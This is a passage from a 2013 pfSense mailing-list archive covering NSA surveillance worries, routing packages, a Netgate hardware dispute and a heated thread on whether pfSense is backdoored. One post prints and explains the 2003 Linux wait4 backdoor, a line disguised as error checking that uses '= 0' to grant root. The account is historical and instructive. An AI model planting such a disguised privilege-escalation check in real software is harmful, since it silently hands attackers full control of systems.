always” you mean “occasionally isn’t”, fine. If you mean “often isn’t”, then I fundamentally disagree. jim___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 6:49 PM, Bob Gustafson bob...@rcn.com wrote: The new Apple operating system = Mavericks or iOS 7 will have an autoupdate feature. Which can be disabled. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
(getting back to the actual subject…) The actual documents are worthy of a look. For example, at http://www.nytimes.com/interactive/2013/09/05/us/documents-reveal-nsa-campaign-against-encryption.html?ref=uspagewanted=all (Goal for CY2013): Complete enabling for [redacted] encryption chips used in Virtual Private Network and Web encryption devices”. With the following note: Large Internet companies use dedicated hardware to scramble traffic before it is sent. In 2013, the agency planned to be able to decode traffic that was encoded by one of these two encryption chips, either by working with the manufacturers of the chips to insert back doors or by exploiting a security flaw in the chips' design.” Another interesting goal: Shape worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS. Elsewhere, enabling access and exploiting systems of interest and inserting vulnerabilities”. These are side-channel attacks. I see no other reference to cryptanalysis, so I would take this statement at face value: NSA has techniques for doing cryptanalysis on certain algorithms/protocols out there, but not all, and they would like to steer public cryptography into areas for which they have attacks. This makes any NSA recommendation *extremely* suspect. As previously reported, and as far as I can see, the big push NSA is making these days is toward ECC with particular curves. Makes you wonder, and makes me willing to reverse my previous position of Suite B library as “best practices”. NSA has two separate roles: Protect American communications, and break into the communications of adversaries. Given the revelations of the past 60 days, one of these things is true: (a) the latter part of the mission has come to dominate the former; or (b) the current definition of an adversary has become so broad as to include pretty much everyone. Jim p.s. It maybe be of interest that both “Bullrun”, and “Manassas”, the program it replaced, are names of battles during the (US) Civil War. Fun reading: http://www.slate.com/blogs/the_slatest/2013/09/06/nsa_bullrun_manassas_why_is_the_nsa_naming_its_covert_programs_after_civil.html ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] PBI packaging: BGPd vs OSPFd
On Sep 15, 2013, at 11:50 AM, Adam Thompson athom...@athompso.net wrote: Is BGPd in Quagga likely to be a huge PITA? If not, I'll probably take a stab at integrating it into the GUI. If I can figure out how to build packages, anyway. (I'd prefer OpenOSPFd instead of Quagga, but that seems like a dead duck in pfSense now.) I strongly prefer Quagga over OpenBSD’s “solution”, but mostly because ISC has gotten behind it. https://github.com/opensourcerouting/quagga I do now need a more-capable router than what pfSense gives me, in the sense that I need to be able to run EGPs and IGPs simultaneously. Perhaps we need a separate ‘pro routing’ product/project that eliminates a lot of the “home network” functionality that doesn’t belong on a box that core to forwarding packets. Jim -Adam Jim Pingle li...@pingle.org wrote: On 9/15/2013 11:58 AM, Adam Thompson wrote: Reading the release notes for 2.1 reminded me of something... shouldn't the use of PBI packaging now automagically resolve the conflicts between OpenBGPd/OpenOSPFd and Quagga? Somewhat. The actual calls to the binaries in their respective packages use the links in /usr/local/(s)bin/ so they still conflict since the links from one PBI will clobber the links from another. If the packages were adjusted to call the binaries from their isolated PBI dirs, then it may be OK, though since the actual binary names are the same (e.g. bgpd) some things such as the service status may not reflect the right status. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] PBI packaging: BGPd vs OSPFd
On Sep 15, 2013, at 12:30 PM, Jim Pingle li...@pingle.org wrote: On 9/15/2013 1:17 PM, Adam Thompson wrote: If we mix Quagga and BIRD, don't we wind up with fragmentation problems very similar to what we have now? No because as far as I can see BIRD's binaries are bird, birdc, and birdcl. It doesn't have a dedicated daemon process for each type of routing. I want to like bird, I really do. But it’s Quagga that has gotten all the runtime in real networks, and attention to its codebase lately. jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] 2.1 on WRAP
On Sep 20, 2013, at 6:45 AM, Odette Nsaka odette.ns...@libero.it wrote: Does somebody know other reliable and cheap embedded platforms running pfSense with no problem? http://store.netgate.com/Netgate-FW-525B-P1919C83.aspx ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] 2.1 on WRAP
On Sep 20, 2013, at 9:09 AM, Bill Arlofski waa-pfse...@revpol.com wrote: To be clear, when I said non-ALIX, I meant to say Netgate FW-7535H with 2GB (maybe 4GB, not sure right now) RAM. If you put 4GB in it, you're a magician. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NETGATE FW-7535 pfSense 2.0.2-RELEASE OpenVPN Data Corruption
Netgate sold you a FW-7535 with a CF card and either 1MB or 2MB of ram, originally. You changed the ram and installed an SSD, reloaded pfSense, and now you want to complain that Netgate couldn’t… what, exactly? There are thousands of FW-75xx systems in the world, happily running pfSense. The problems we have tend to develop when people assume they know better about what the machine can support, and start treating it like a garden-variety PC. It’s not. It shares the Intel architecture, sure, but it’s an embedded system, with attendant requirements (mostly environmental) that no PC would deal with for long. I actually know that the replacement unit you received was running (“in service”) between two fiber connections. The one you received was one of the last remaining 7535s(*), in something like mint condition, which we could lay our hands on. It was pulled from a live environment, put back through the factory load process, and shipped to you. It goes without saying that there was no “packet corruption” evident when it was last in-service here. I, for one, would be curious to know if the ‘corruption’ which you accuse recurs with the original, as-shipped configuration. Jim (*) Another choice was to take the 7535 we have running Asterisk (FreePBX), and refurbish it to factory fresh. On Sep 29, 2013, at 7:45 AM, master8...@aol.com wrote: I finally was able to receive an advanced replacement from Netgate a few weeks ago. I swapped it out leaving my old install intact and the problem disappeared on the new device. After all the installs with the various Netgate FW models over the years (not the m1n1wall, those have been awesome but are too outdated for me to be using on 100meg+ internet), Their reliability has been lacking and the issues that arise are always hard to diagnose and prove (freezing, no response situations, corrupting packets). I think I am just going to give up a few Ethernet ports that I don't end up using anyways and start building my own. Jonathon On 8/20/2013 11:08 AM, master8...@aol.com wrote: I switched out the memory and the SSD, reinstalled pfsense, and after a few weeks of operation, VPN traffic started corrupting again. A soft reset doesn't fix it. A hard reset (by pulling the power cord for a few seconds) does. I tried contacting Netgate and didn't receive a response. Does anyone know what could be going on here? Thanks, Jonathon On 7/26/2013 9:04 AM, master8...@aol.com wrote: Scanned the memory with memtest this morning and scanned the Intel SSD as well, it's all fine. I did stumble across something that fixes it though. Pulling the power cord for a few seconds. The act of removing power from my Netgate FW-7535 caused everything to start working. I probably soft reset it from the console 10 times and kept getting corrupted OpenVPN connections until I actually pulled power from the thing. I am starting to lean towards something on it's motherboard being defective. I will switch out the memory and SSD in a few days just to make sure it's not them. Thanks, Jonathon On 7/25/2013 6:25 PM, Bob Gustafson wrote: On 07/25/2013 04:59 PM, master8...@aol.com wrote: The last few months I have been having issues with OpenVPN connections from my road warriors. It appears that most of the traffic crossing the link is corrupted. I can't use remote desktop, it always says because of an error in data encryption, the session will end. I can't use the company intranet, it always displays the pages corrupted or doesn't load them at all. What do I mean by corrupted? See how it butchered the page load of the pfSense web admin interface. http://imgur.com/3B6EAAT This doesn't look too bad. I am assuming that you have sliced out the data for security purposes - or is that the corruption? All of this obvious data corruption and not a single peep in the logs. Nothing, nowhere. I have 20 installs and this is the only one that has ever given me an issue like this. Does anyone have any ideas? Are you saying 20 installs on different hardware, or 20 installs sequentially over several months/versions on the same box. If 20 on separate boxes, I would do a memory test on the failing box. Bob G Thanks, Jonathon ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NETGATE FW-7535 pfSense 2.0.2-RELEASE OpenVPN Data Corruption
Yudhvir, I’m just grumpy, because of messages like the below (OP, not you), and threads like this: http://forum.pfsense.org/index.php/topic,66684.15.html Note again that it’s someone who decided to put their own SSD in the box, loaded their own version of pfSense, then blew their foot off when they upgraded to 2.1. First, netgate does NOT have “it’s own version of pfSense”.Yes, we re-brand the GUI, or rather, we have the pfSense team do it. Costs us money, every month. (Money we’ve been happy to pay every month since sometime in 2006. Money which directly supports the pfSense project. There is a version of pfSense 2.0.3 (specifically, 2.0.3p1) which specifically adds support for the Realtek devices on the Jetway system we sell. When we made this release, it was pushed back through the build process by Jim Pingle. Restated: it didn’t come directly from Netgate personnel. Second, most people should be aware by now that Jamie and I (the ‘owners’ of Netgate) are also (with cmb) co-owners of the company behind pfSense. This has been true for a bit over a year now. I am involved with both companies, both in terms of day to day operations and things more strategic. cmb’s office is next door to mine. Third, most people should have noted that Netgate’s version 2.1 didn’t ship simultaneous with the ‘stock’ pfSense. There are reasons, mostly related to a lack of testing by the pfSense crew, and my desire to drive any changes for same back through the pfSense side. As was discovered late in the thread referenced above, the ‘name’ of the disk changes, assuming a HD is present. When we build these (once we did), the settings were updated (first by hand, and now with a custom BIOS config) the CMOS is set such that the upgrade to 2.1 will correctly complete. We take a lot of time and care releasing systems into the world. We develop and test specific processes for the people building systems to follow, such that we *know* what is in the field. We spent a long time with people hammering the sales side of Netgate for a SSD solution before I allowed one to ship. There are many reasons for this, including a distinct lack of reliable SSDs, lack of TRIM support in the underlaying FreeBSD kernel, lack of a repeatable high-speed loading solution, some insight into what 2.1 would bring, etc. So when people decide they know better, make a mess, and then (worse) occasionally demand a refund “because the system doesn’t work”, it raises my ire. Sorry for allowing that to show through. I’m doing my best to keep the codebases from diverging, but I keep hearing echoes in the community that Netgate has all but forked pfSense. If there was one company most unlikely to fork pfSense, it’s Netgate. Jim On Sep 30, 2013, at 10:56 AM, Mehma Sarja mehmasa...@gmail.com wrote: Jim, Netgate has a solid reputation for quality stuff and I happen to be a happy customer. On occasion when I've called with technical questions, your support has been very good. Enough for me to recommend your company and products... and support. Therefore, I find your starting tone a bit defensive. The customer in question obviously had the need to make the changes he did. And it messed up the machine. We all get that. You do not need to point that out. Yudhvir On Mon, Sep 30, 2013 at 8:23 AM, Jim Thompson j...@netgate.com wrote: Netgate sold you a FW-7535 with a CF card and either 1MB or 2MB of ram, originally. You changed the ram and installed an SSD, reloaded pfSense, and now you want to complain that Netgate couldn’t… what, exactly? There are thousands of FW-75xx systems in the world, happily running pfSense. The problems we have tend to develop when people assume they know better about what the machine can support, and start treating it like a garden-variety PC. It’s not. It shares the Intel architecture, sure, but it’s an embedded system, with attendant requirements (mostly environmental) that no PC would deal with for long. I actually know that the replacement unit you received was running (“in service”) between two fiber connections. The one you received was one of the last remaining 7535s(*), in something like mint condition, which we could lay our hands on. It was pulled from a live environment, put back through the factory load process, and shipped to you. It goes without saying that there was no “packet corruption” evident when it was last in-service here. I, for one, would be curious to know if the ‘corruption’ which you accuse recurs with the original, as-shipped configuration. Jim (*) Another choice was to take the 7535 we have running Asterisk (FreePBX), and refurbish it to factory fresh. On Sep 29, 2013, at 7:45 AM, master8...@aol.com wrote: I finally was able to receive an advanced replacement from Netgate a few weeks ago. I swapped it out leaving my old install intact
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
(TIC mode: on) I think it’s obvious that: - ESF is a front for the NSA - the acquisition which closed last year was really just about gaining control of a critical component of Internet infrastructure. - the delays getting 2.1 out the door were exclusively about getting some last-minute backdoor code installed. AYBAB2U, baby! (TIC mode: off) On Oct 9, 2013, at 5:56 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 18:20, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response Exactly, Paul, you got my point! although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ? @your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless. 2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article NSA Laughs at PCs, Prefers Hacking Routers and Switches (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html) So, combining those 2 facts - the fact that the NSA/FBI/etc. prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate! Greetings Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:38 PM, Thinker Rix thinke...@rocketmail.com wrote: My main question was not if the code includes bad things, but if the company behind pfSense has been approached (yet) by authorities to comply with their Orwellian global police state phantasy. already answered. Twice. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:46 PM, David Burgess apt@gmail.com wrote: On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote: So asking the question is stupid(*), because a lie is indistinguishable from the truth. I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of: 1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied. 2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition. IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. It doesn’t contribute anything to the project. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:56 PM, Eugen Leitl eu...@leitl.org wrote: On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The only thing that has changed is that now outrage has become popular. The New York Times’ James Risen and Laura Poitras penned an article a couple weeks ago titled ‘NSA Gathers Data on Social Connections of U.S. Citizens” in which they make the claims based on documents leaked by “Edward Snowden”. “… the National Security Agency has been exploiting its huge collections of data to create sophisticated graphs of some Americans’ social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information, according to newly disclosed documents and interviews with officials… … according to documents provided by Edward J. Snowden… … The new disclosures add to the growing body of knowledge in recent months about the N.S.A.’s access to and use of private information concerning Americans” New York Times See: http://www.nytimes.com/2013/09/29/us/nsa-examines-social-networks-of-us-citizens.html?pagewanted=all William E. Binney (perhaps you should google him) was speaking directly to Laura Poitras when he said these words slightly over a year ago: “The purpose is to be able to monitor what people are doing. You build social networks for everybody that then turns into the graph then you index all that data to the graph which means you can then pull out a “community” with an outline of the life of everyone in the community. And if you carried it over time from 2001 up you have 10 years of their life you can lay out in a timeline. That involves anybody in the country” William E. Binney, Aug. 2012, speaking to Laura Poitras in HER documentary The Program http://www.nytimes.com/2012/08/23/opinion/the-national-security-agencys-domestic-spying-program.html?_r=0 Do you think she forgot this interview while she was writing an article in the New York Times last month that she was told this “groundbreaking” revelation long ago? Because she never mentions Binney in her new article. Why? Seriously, ask yourself why. She also doesn’t mention key things like “Stellar Wind” or NarusInsight. These are real programs. For all we know, Pyramid is nothing more than a Powerpoint deck created for a psyop purposes. Maybe it’s real, and maybe this is all a smokescreen for something else. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. how official do you want an answer to be? ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. May I ask again if you are an staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:36 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 20:04, Walter Parker wrote: About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agency's have done similar things, so if you starting asking, you discover that the major governments are trying to do this and have succeed more often than we would like. Yes, it is horrifying. Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think. Not interesting, just simple ego stroking. As for those who want to read the source to find bugs … Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy. But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change. What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code: if ((options == (__WCLONE|__WALL)) (current-uid = 0)) retval = -EINVAL; [Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.] A casual reading by anyone less than expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful (and somewhat) expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current-uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero. Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor. This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up. Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know. We still dont have a report on the kernel.org hack of 2011. Why not? Many people say, calm down, its git they can’t have inserted backdoors etc without messing up the git history/changelog/hashes/whatever. But what if git was modified and backdoored previously to hide some objects/changes? How would such an attack work? Lets say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel? Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:41 PM, Thinker Rix thinke...@rocketmail.com wrote: We all know that the governments currently force on a daily base one company after the other to comply to their New World Order-Orwellian-global-surveillance phantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something. You just want to have a discussion. Perhaps it makes you feel important, I don’t know. Your Alex Jonesian “New World Odor” rhetoric is tiring. Your NECESSARY discussion is not, because in the end analysis the discussion you want to have is orthogonal to the subject. You should instead only depend on you and your tools to ensure your security. Asking me (or Chris, or Jamie) to answer the question puts everyone in a position where nothing can be learned, so it is useless, rather than NECESSARY. Until you understand and accept this, your messages are mere platitudes. Look, The integrity and bravery Ladar Levison has shown in his fight is impressive. He has definitely earned enough cred to restart his business outside the US and be very successful, but my hope is that he does not. We should celebrate Ladar for making the decision to put himself at risk in order to protect his users, but I think we should be careful not to forget that Ladar was forced to make that decision because the security of Lavabit was all a complete and total hand wave. There are already technologies such as PGP, S/MIME, smart cards, and the dozens of other ways we can have secure email without relying on a trusted third party such as Lavabit. Lavabit could respond to a demand for plaintext, if Ladar were willing to do so (and in the end, he was, for a particular user); on the other hand, Google cannot give anyone access to the plaintexts of S/MIME encrypted messages that I send through their servers because of technical barriers. That is the point of doing your encryption locally, and that is why security and privacy are not, and never will be, a service.(*) This wasn't untested water, either. The exact same thing happened to Hushmail in 2007 for the exact same reason, and should have been evidence enough that the model isn't viable, even for a non-US company. http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/ So again, I think we should definitely support Ladar as a person, but we also need to be careful not to confuse that with supporting Lavabit, (the company) which was a very real danger that should never be repeated again (again). How you interpret this and subsequently apply it to ESF and/or pfSense is up to you. Jim (*) if you think about it for very long, it also shows that Snowden is not the Ür-hacker than the press wants to make him. His communications via Lavabit only gave the appearance of security, and he wasn’t smart enough to understand same. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Can pfSense be considered trusted? What implementations of VPNs can now be trusted?
On Oct 10, 2013, at 4:34 PM, Yehuda Katz yeh...@ymkatz.net wrote: Since we keep coming back to FreeBSD as it pertains to security: 3) FreeBSD is very mature, and very well reviewed. I've looked into FreeBSD to my personal satisfaction. OpenBSD may be abrasive as a community at times, but their work product is pretty impressive in terms of being clean and funcitonal. I was very happy with how they handled that whole IPSec fiasco in 2011. I've been following pfSense for a while now, and I've used it off and on for years. I'm very satisfied by the quality and oversight of the coding. But by all means dig as long as your curiosity holds out. you can never be 100% sure of the security of any software, but sufficiently sure is absolutely worth looking into. FreeBSD is not the distribution in the BSD family that is best known for security. Indeed OpenBSD has a specific focus on security (which has been studied, as has the relationship between the BSDs), but FreeBSD focuses on being more inclusive of a variety of hardware at a cost of not being 100% open source. That is a tradeoff, but it does not mean that FreeBSD is not secure, it just means ... well I have not found a study about that yet. Go ahead and believe the marketing/hype (“best known”) about OpenBSD if you like. the simple fact is, if security issues are found in any of the BSDs, the fixes for them quickly propagate between all of them. In the end, OpenBSD is no more ‘secure’ than FreeBSD or NetBSD. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 5:42 PM, Paul Mather p...@gromit.dlib.vt.edu wrote: I first started using mailing lists back in the mid/late 1980s, You’re not the only one. :-) I too was entertained by the n00b trying to tell grandpa how to use email. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1: which FreeBSD version?
On Oct 10, 2013, at 6:25 PM, Jim Pingle li...@pingle.org wrote: You shouldn't need the -archive bits since 8.3 is still a supported release. Until next April, anyway. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Can pfSense be considered trusted? What implementations of VPNs can now be trusted?
On Oct 10, 2013, at 4:49 PM, Giles Coochey gi...@coochey.net wrote: On 10/10/2013 15:04, Chris Bagnall wrote: What made you change from AES to Blowfish, and is there any evidence to suggest that Blowfish is more 'secure' than AES? My understanding is that AES was championed by an agency which has received recent bad-press.;-) This is not an answer. Blowfish was a contender to actually become AES wasn't it? yes, but even Bruce Schneier, Blowfish's creator, is quoted in 2007 as saying At this point, though, I'm amazed it's still being used. If people ask, I recommend Twofish instead.' https://www.computerworld.com.au/article/46254/bruce_almighty_schneier_preaches_security_linux_faithful/ I agree that I might see better performance with AES as it is supported in hardware by many chipsets, and when selected all the contenders marked AES as second best (after their own submissions of course...). I'm not saying it is insecure, I'm just weary of the following: non-technical reasons Is there any mechanism to insert ciphers into Pfsense that are not currently supported? You have the source code. I, for one, am uninterested in non standards-compliant (and thus interoperable) implementations. jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] naive suggestion: conform to US laws
On Oct 12, 2013, at 7:20 AM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-11 22:33, Walter Parker wrote: Yes, you have been informed correctly. There are more than 2. According the World Atlas (http://www.worldatlas.com/nations.htm#.UlhOHVFDsnY) the number is someone between 189 and 196. No kidding! ;-) But you did not answer the question asked: Name the country that you would move the project to and why you believe that country would do a better job? Why should *I* name it and why should I present ready solutions for an idea another community member brought up? Why should anybody be in a position to present ready solutions at this point? How about having a fruitful discussion and find solutions together? There is no reason to build a house on sand. There is no fruitful discussion to be had when the premise is patently false. Then because the USA can't be trusted, who is going to replace the Americans on the project? You are mixing things up here. Just because the USA invented their tyrannous Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act, for which they perversely coined the euphemistic term Patriot Act and there fore can not be trusted anymore for hosting anything there, why should the Americans be replaced?!?!? The name and logo are owned by an American company. I guess, that is true, i.e. that ESF registered pfSense and it's log as a brand name. You seem upset at this. Why? Instead of some kooky conspiracy theory that ESF could be tortured or pressured to weaken pfSense, is this the *real* issue you have? I doubt they want to give them up to a foreign company owned by non-Americans Nobody suggested that. Try thinking a bit more outside the box! For instance: A non-profit foundation could be founded in a country outside the USA, and the brand, hosting of the project, etc. be transferred to that company. A board would be elected for this foundation who just a few basic things annually to keep the foundation running. ESF on the other side would be released of a great threat! They could continue offering their pfSense services to their customers as usual, but from now on nobody could come and force them to do things to pfSense since they have nothing to do with it”. You seem upset that ESF controls the project. Why? just to make it harder for the American government to pressure the project. Incorporating pfSense and bringing it out of the reach of US-domestic jurisdiction would not make it harder but impossible to pressure the project. You have provided no explanation (other than “rubber hoses”) for what form that “pressure” would take. If the rest of world wants to fork the project because of concerns about the US government, fine, but I don't think you will get buy in from ESF [the American company that owns the rights to the name pfSense]. Why to fork the code base?! No one suggested that - and no one suggested to do things without - or even against - the key people of the ESF. Right the opposite. It would even protect the ESF! Once again, name some names. Who do you consider more trustworthy? I am not Jesus to hand solutions to the community on a silver platter though point in fact, Jesus didn’t hand anyone a solution. (but surely would be available for a *constructive* and *well-disposed*, *amicable* discussion to find solutions together!). I know of quite a lot of countries that seem interesting for a closer analysis for this cause and surely would propose one or another in such a constructive discussion. Generally, what Adrian proposed makes only sense, if the community - including ESF - understands the threat and decides to act proactively to fight this threat. “The community” doesn’t own the copyright on the code, nor the trademarks to the names used. Those belong to ESF. Further, you’ve hypothesized about a ‘threat’ without providing any factual basis for same. The term for this form of argument is “conspiracy theory”. Since pfSense is open source (specifically, the BSD license), “the community” (or rather “a community”) could take the decision to fork the code and create their own solution. It’s been attempted a couple times, but none of these have flourished. While I don’t encourage forks (it’s typically not good for either project), occasionally they work out (at least for a while), I don’t go out of my way to inhibit those who wish to fork. However, in any case, such a community would be prohibited from naming the result “pfSense”. But since 33% of the ESF - namely Jim Thompson You greatly inflate my ownership interest here. - prefers bullying, insulting, frightening and muzzling anybody who brings up the threat that we are facing, trying to strike dead any thought as soon as it comes up (strange, isn't it?), Not as strange as someone randomly showing up one day, hiding
Re: [pfSense] Upgrade Guide: Needs update for Auto Update
